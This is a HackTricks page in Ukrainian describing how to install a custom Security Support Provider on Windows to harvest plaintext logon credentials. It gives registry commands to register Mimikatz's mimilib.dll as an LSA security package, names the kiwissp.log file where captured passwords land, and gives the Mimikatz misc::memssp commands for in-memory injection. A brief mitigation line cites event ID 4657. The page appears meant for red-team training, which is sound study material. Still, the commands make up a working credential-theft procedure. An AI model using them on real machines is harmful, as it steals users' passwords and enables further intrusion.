Custom SSP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Custom SSP

Дізнайтеся, що таке SSP (Security Support Provider) тут. Ви можете створити свій власний SSP, щоб захопити у відкритому тексті облікові дані, які використовуються для доступу до машини.

Mimilib

Ви можете використовувати бінарний файл mimilib.dll, наданий Mimikatz. Це буде записувати у файл всі облікові дані у відкритому тексті. Скиньте dll у C:\Windows\System32\ Отримайте список існуючих LSA Security Packages:

attacker@target
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Додайте mimilib.dll до списку постачальників підтримки безпеки (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

І після перезавантаження всі облікові дані можна знайти у відкритому вигляді в C:\Windows\System32\kiwissp.log

У пам'яті

Ви також можете безпосередньо впровадити це в пам'ять, використовуючи Mimikatz (зверніть увагу, що це може бути трохи нестабільно/не працювати):

privilege::debug
misc::memssp

Це не переживе перезавантаження.

Пом'якшення

ID події 4657 - Аудит створення/зміни HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Last updated